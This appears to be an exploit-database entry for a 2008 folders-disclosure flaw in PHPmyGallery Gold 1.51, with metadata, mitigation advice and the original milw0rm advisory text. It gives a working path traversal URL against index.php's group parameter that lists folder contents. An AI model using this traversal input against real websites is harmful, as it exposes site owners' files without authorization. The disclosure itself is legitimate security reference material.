PHPmyGallery Gold 1.51 (index.php) Folders Disclosure

vendor:

PHPmyGallery Gold

by:

zAx

8.8

CVSS

HIGH

Folders Disclosure

N/A

CWE

Product Name: PHPmyGallery Gold

Affected Version From: 1.51

Affected Version To: 1.51

Patch Exists: YES

Related CWE: N/A

CPE: a:kapierich_software:phpmygallery_gold

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

PHPmyGallery Gold 1.51 (index.php) Folders Disclosure

PHPmyGallery Gold 1.51 is vulnerable to folders disclosure. An attacker can exploit this vulnerability to view the content of any folder in the vulnerable website.

Mitigation:

Upgrade to the latest version of PHPmyGallery Gold.

Source

Exploit-DB raw data:

            ############### Yee7.Com ###############
             ############### zAx #################
        PHPmyGallery Gold 1.51 (index.php) Folders Disclosure
 -----------------------------------------------------------------------------------------------------------

 [+] Script        : PHPmyGallery Gold 1.51
 [+] Vuln.          : Folders Disclosure
 [+] Download :http://phpmygallery.kapierich.net/en/downloads/
 [+] Discovered By  :         zAx [ThE-zAx@Hotmail.Com]
 [+] Team:  Electronic Security Team (Yee7.Com)

Exploit : http://site/phpmygallery/index.php?group=../somefolder

 [+]Somefolder is any folder in the vulnerable website
 [+] ../ = Up from this folder
 [+] You can see all folders those are in "somefolder"


[+] Important : This vulnerability is Discovered By Yee7-Team, By [ zAx ] and [ ShockShadow ]

# milw0rm.com [2008-12-07]